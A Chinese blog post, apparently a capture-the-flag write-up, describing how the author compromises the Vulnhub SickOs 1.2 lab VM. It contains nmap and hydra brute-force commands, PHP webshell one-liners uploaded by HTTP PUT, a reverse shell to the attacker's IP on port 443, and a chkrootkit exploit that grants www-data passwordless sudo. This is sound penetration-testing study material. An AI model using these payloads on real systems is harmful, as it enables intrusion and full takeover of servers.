

<!DOCTYPE html>
<html lang="zh-Hans" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="
缺乏经验，学习之
">
  <meta name="author" content="Shawn">
  <meta name="keywords" content="">
  
  <title>Vulnhub SickOs1-2 Writeup - P3aceSh4wn&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="P3aceSh4wn's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>peaceSh4wn's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Links
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.jpeg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Vulnhub SickOs1-2 Writeup">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      Shawn
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-09-04 15:11" pubdate>
        September 4, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.5k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      20
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Vulnhub SickOs1-2 Writeup</h1>
            
            <div class="markdown-body">
              <blockquote>
<p>缺乏经验，学习之</p>
</blockquote>
<a id="more"></a>

<h2 id="0x01-信息搜集"><a href="#0x01-信息搜集" class="headerlink" title="0x01 信息搜集"></a>0x01 信息搜集</h2><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-comment"># 扫描靶机地址</span><br><span class="hljs-string">nmap</span> <span class="hljs-string">-sn</span> <span class="hljs-string">-T5</span> <span class="hljs-number">192.168</span><span class="hljs-number">.206</span><span class="hljs-number">.1</span><span class="hljs-string">/24</span><br><br><span class="hljs-comment"># 扫描开启服务和端口</span><br><span class="hljs-string">nmap</span> <span class="hljs-string">-sV</span> <span class="hljs-string">-A</span> <span class="hljs-string">-p-</span> <span class="hljs-string">-T5</span> <span class="hljs-number">192.168</span><span class="hljs-number">.206</span><span class="hljs-number">.151</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>PORT   STATE SERVICE VERSION<br>22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)<br>| ssh-hostkey:<br>|   <code>1024 66:8c:c0:f2:85:7c:6c:c0:f6​​:ab:​7d:48:04:81:c2:d4 (DSA)</code><br>|   <code>2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)</code><br>|_  <code>256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)</code><br>80/tcp open  http    lighttpd 1.4.28<br>|_http-server-header: lighttpd/1.4.28<br>|_http-title: Site doesn’t have a title (text/html).<br>MAC Address: 00:0C:29:CE:AB:B8 (VMware)<br>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port<br>Device type: general purpose<br>Running: Linux 3.X|4.X<br>OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4<br>OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4<br>Network Distance: 1 hop<br>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</p>
<p>TRACEROUTE<br>HOP RTT     ADDRESS<br>1   0.98 ms 192.168.206.151</p>
</blockquote>
<p>两个端口开放80和22</p>
<h3 id="80端口"><a href="#80端口" class="headerlink" title="80端口"></a>80端口</h3><p>访问一下80，就一张meme图</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/1.png" srcset="/img/loading.gif" lazyload alt><br>查看源码，也没有东西，使用dirb和nikto扫描端口</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/2.png" srcset="/img/loading.gif" lazyload alt><br>出现一个<code>test</code>文件夹，浏览器访问</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/3.png" srcset="/img/loading.gif" lazyload alt><br>得知是<code>lighttpd 1.4.28</code>版本，查看web指纹</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/4.png" srcset="/img/loading.gif" lazyload alt><br>没有建设性资料，再于其基础上dirb路径爆破，依然无果，80端口暂放</p>
<h3 id="22端口"><a href="#22端口" class="headerlink" title="22端口"></a>22端口</h3><p>hydra进行ssh爆破</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">hydra -L top-usernames-shortlist.txt -P password-100.txt 192.168.206.151 -t 20 -I ssh<br>hydra -L top-usernames-shortlist.txt -P password-1000.txt 192.168.206.151 -t 20 -I ssh<br></code></pre></td></tr></table></figure>

<p>均未成功，看来这里存在知识盲区</p>
<p>一番查询后得知，可用curl来服务器探查支持的HTTP方法，就对于仅有的两个页面进行探查</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">curl -v -X OPTIONS http://192.168.206.151<br>curl -v -X OPTIONS http://192.168.206.151/test/<br></code></pre></td></tr></table></figure>

<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/5.png" srcset="/img/loading.gif" lazyload alt><br><code>/test/</code>路径下支持多种方法</p>
<h2 id="0x02-漏洞挖掘与利用"><a href="#0x02-漏洞挖掘与利用" class="headerlink" title="0x02 漏洞挖掘与利用"></a>0x02 漏洞挖掘与利用</h2><p>以前只在图解HTTP中听说过，从来没有实际操作过HTTP方法。使用curl直接采用PUT方法，尝试将后门放入服务器</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs shell">curl -v -X PUT -d "&lt;?php system($_GET['cmd']); ?&gt;" http://192.168.206.151/test/t.php<br><span class="hljs-meta">#</span><span class="bash"> -v 回显信息</span><br><span class="hljs-meta">#</span><span class="bash"> -X 请求方法</span><br><span class="hljs-meta">#</span><span class="bash"> -d post数据</span><br>&lt;?php $a = "assert"; $a(@$_POST['shell']); ?&gt;<br></code></pre></td></tr></table></figure>



<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/6.png" srcset="/img/loading.gif" lazyload alt><br>可以看见在<code>test</code>页面中出现了<code>t.php</code></p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/7.png" srcset="/img/loading.gif" lazyload alt><br>用蚁剑连接，连接超时！</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/8.png" srcset="/img/loading.gif" lazyload alt><br>一句话中没有中文字符，同时也测试了好几个其他免杀木马，均连接失败，随手传了个phpinfo却能执行</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/9.png" srcset="/img/loading.gif" lazyload alt><br>经过验证，后台代码可以执行，但是无法接收，这样也好说，既然传不了那我就直接执行，结果也会失败。</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/10.png" srcset="/img/loading.gif" lazyload alt><br>如上图，能看见是服务端错误</p>
<ul>
<li>waf拦截</li>
</ul>
<p>这种一直断连的场景存在waf的可能性很高，于是使用<code>nmap</code>、<code>wafw00f</code>、<code>sqlmap</code></p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/11.png" srcset="/img/loading.gif" lazyload alt></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell">nmap -p 443, 80 --script=http-waf-detect 192.68.206.151/test<br><br>wafw00f -a url<br><span class="hljs-meta">#</span><span class="bash"> -a 所有类型waf</span><br></code></pre></td></tr></table></figure>

<p>以上的waf探测没有下文</p>
<ul>
<li>点击<code>test</code>下的<code>x.php</code>，使用burpsuite进行拦截，直接在bp中对HTTP报文进行修改，将一句话写入</li>
</ul>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/12.png" srcset="/img/loading.gif" lazyload alt><br>尝试访问，成了！</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/13.png" srcset="/img/loading.gif" lazyload alt><br>我想看看之前为什么会出错，所以继续写入指令<code>cat%20x.php</code>，然后用bp拦截</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/14.png" srcset="/img/loading.gif" lazyload alt><br>上图可见，我们用curl写入的webshell已经不成形了，后续再次写入webshell并cat查看，发现<code>$_GET[&#39;pass&#39;]</code>变成了<code>[&#39;pass&#39;]</code>，带有<code>$</code>的部分都被删去了一些，不用说了，看下面的解析。</p>
<h3 id="问题总结"><a href="#问题总结" class="headerlink" title="问题总结"></a>问题总结</h3><blockquote>
<p><strong>问题的来龙去脉</strong>（Kioptrix2014也遇到过）</p>
<p>php一句话的两种写法</p>
<p><code>&quot;&lt;?php system($_GET[&#39;pass&#39;]); ?&gt;&quot;</code></p>
<p><code>&#39;&lt;?php system($_GET[&quot;pass&quot;]); ?&gt;&#39;</code></p>
<p>第一种：双引号套单引号</p>
<p>​    $号会被解析，需要转义</p>
<p>第二种：单引号套双引号</p>
<p>​    $号不会被解析，无需转义</p>
</blockquote>
<ul>
<li>好的，我们再次用蚁剑连接能用的webshell，结果继续<strong>失败</strong>，这里推测进行了拦截，那么还有一条路<strong>直接反弹shell</strong></li>
</ul>
<p>找到kali中的<code>php-reverse-shell.php</code>文件，调整ip为<code>192.168.206.142</code>，port为<code>4444</code>，复制全部代码，粘贴到bp中发送。</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/15.png" srcset="/img/loading.gif" lazyload alt><br>kali中nc监听，浏览器中点击reverse-webshell，然而nc中并没有连接</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/16.png" srcset="/img/loading.gif" lazyload alt><br>经过查询（这里应该自己慢慢扫描，原因是管理员对iptables or Firewall进行了配置），靶机之开启了443端口进行交互，所以我们将<code>php-reverse-shell</code>的port设置为443，bp重新发送，nc也监听443端口，点击<code>shell.php</code></p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/17.png" srcset="/img/loading.gif" lazyload alt><br>成功拿到反弹shell</p>
<h2 id="0x03-提权-amp-get-flag"><a href="#0x03-提权-amp-get-flag" class="headerlink" title="0x03 提权&amp;get flag"></a>0x03 提权&amp;get flag</h2><p>发现python能用，遂将哑shell升级为交互shell，然后获取一波os信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">python -c "import pty;pty.spawn('/bin/bash');"<br></code></pre></td></tr></table></figure>

<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/18.png" srcset="/img/loading.gif" lazyload alt><br>用<code>lsb_release -a</code>查看版本号</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/19.png" srcset="/img/loading.gif" lazyload alt><br>wget和gcc靶机上均能使用</p>
<p>kali上<code>searchsploit</code>查找exp</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/20.png" srcset="/img/loading.gif" lazyload alt><br>用bp写入靶机文件，gcc编译后执行，无一有效</p>
<p>遂借鉴walkthrough，etc下存在chkrootkit 0.49，chkrootkit是一款防rootkit的shell脚本，可是其自身也存在漏洞，可以被利用于提权</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/21.png" srcset="/img/loading.gif" lazyload alt><br>查看该文件后得到提权思路</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/22.png" srcset="/img/loading.gif" lazyload alt><br>把我们提权代码保存在<code>/tmp/update</code>中，chkrootkit一段时间后便会执行它（通常以root权限）</p>
<p>下面是是exp</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">echo 'echo chmod +w /etc/sudoers &amp;&amp; echo "www-data ALL=(ALL)NOPASSWD:ALL" &gt;&gt; /etc/passwd' &gt; /tmp/update<br><span class="hljs-meta">#</span><span class="bash"> 我们将给予当前用户对sudoers文件的写权限，然后令当前用户能够以无密码模式使用sudo执行所有命令</span><br></code></pre></td></tr></table></figure>

<p>等待一段时间后，执行<code>sudo su - root</code>，拿到root权限，get flag</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/23.png" srcset="/img/loading.gif" lazyload alt><br>我们查看一下root下的newRule文件</p>
<p><img src="/2020/09/04/Vulnhub-SickOs1-2-Writeup/24.png" srcset="/img/loading.gif" lazyload alt><br>果然防火墙设置只有22、80、8080、443端口能够进出</p>
<h2 id="0x04-总结"><a href="#0x04-总结" class="headerlink" title="0x04 总结"></a>0x04 总结</h2><ul>
<li>深入shell语言</li>
<li>Linux提权需要总结</li>
<li>防火墙阻挡执行端口的流量，这样我们就无法用被阻挡得端口反弹shell</li>
<li><code>/etc/sudoers</code>中添加命令的格式：<code>www-data(用户名) ALL=(ALL)NOPASSWORD:ALL</code></li>
</ul>
<h2 id="0x0N-参考资料"><a href="#0x0N-参考资料" class="headerlink" title="0x0N 参考资料"></a>0x0N 参考资料</h2><h3 id="Walkthrough"><a href="#Walkthrough" class="headerlink" title="Walkthrough"></a>Walkthrough</h3><p><a href="https://blog.csdn.net/qq_43168364/article/details/107423640" target="_blank" rel="noopener">vulnhub SickOS1.2靶机</a></p>
<p><a href="https://blog.51cto.com/arckyli/2420601" target="_blank" rel="noopener">获取 SickOS 1.2 Flag (CTF Challenge)</a></p>
<p><a href="https://medium.com/@KamranSaifullah/sickos-1-2-walkthrough-e201e020bce0" target="_blank" rel="noopener">SickOS 1.2 WalkThrough</a></p>
<p><a href="https://resources.infosecinstitute.com/sickos-1-2-walkthrough/#gref" target="_blank" rel="noopener">SickOS 1.2: Walkthrough</a></p>
<p><a href="https://www.sevenlayers.com/index.php/91-vulnhub-sickos-1-2-walkthrough" target="_blank" rel="noopener">Vulnhub SickOs: 1.2 Walkthrough</a></p>
<h3 id="cURL"><a href="#cURL" class="headerlink" title="cURL"></a>cURL</h3><p><a href="https://www.freebuf.com/articles/network/164233.html" target="_blank" rel="noopener">fb 安全工具 | 利用curl 突破服务器限制，进行安全渗透测试</a></p>
<p><a href="http://hackergu.com/curl%e5%9c%a8%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95%e4%b8%ad%e7%9a%84%e5%ba%94%e7%94%a8%ef%bc%88lolbas%ef%bc%89/" target="_blank" rel="noopener">Curl在渗透测试中的应用（LOLBAS）</a></p>
<p><a href="https://cloud.tencent.com/developer/article/1180194" target="_blank" rel="noopener">在渗透中curl的常见用法</a></p>
<p><a href="https://developer.aliyun.com/article/505477" target="_blank" rel="noopener">curl渗透测试常用功能</a></p>
<p><a href="https://blog.csdn.net/Fly_hps/article/details/80564377" target="_blank" rel="noopener">在渗透中curl的常见用法</a></p>
<p><a href="https://juejin.im/post/6844903794958925838" target="_blank" rel="noopener">cURL在Web渗透测试中的应用</a></p>
<h3 id="reverse-webshell"><a href="#reverse-webshell" class="headerlink" title="reverse webshell"></a>reverse webshell</h3><p><a href="https://www.anquanke.com/post/id/87017" target="_blank" rel="noopener">linux各种一句话反弹shell总结</a></p>
<p><a href="https://cloud.tencent.com/developer/article/1180833" target="_blank" rel="noopener">一句话木马绕过研究</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%89%93%E9%9D%B6/">打靶</a>
                    
                      <a class="hover-with-bg" href="/categories/pentest-training/">pentest training</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Vulnhub/">Vulnhub</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/04/05/AXHR-Ghost%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">AXHR_Ghost源码阅读和分析</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/09/01/GoldenEye-Writeup/">
                        <span class="hidden-mobile">GoldenEye Writeup</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
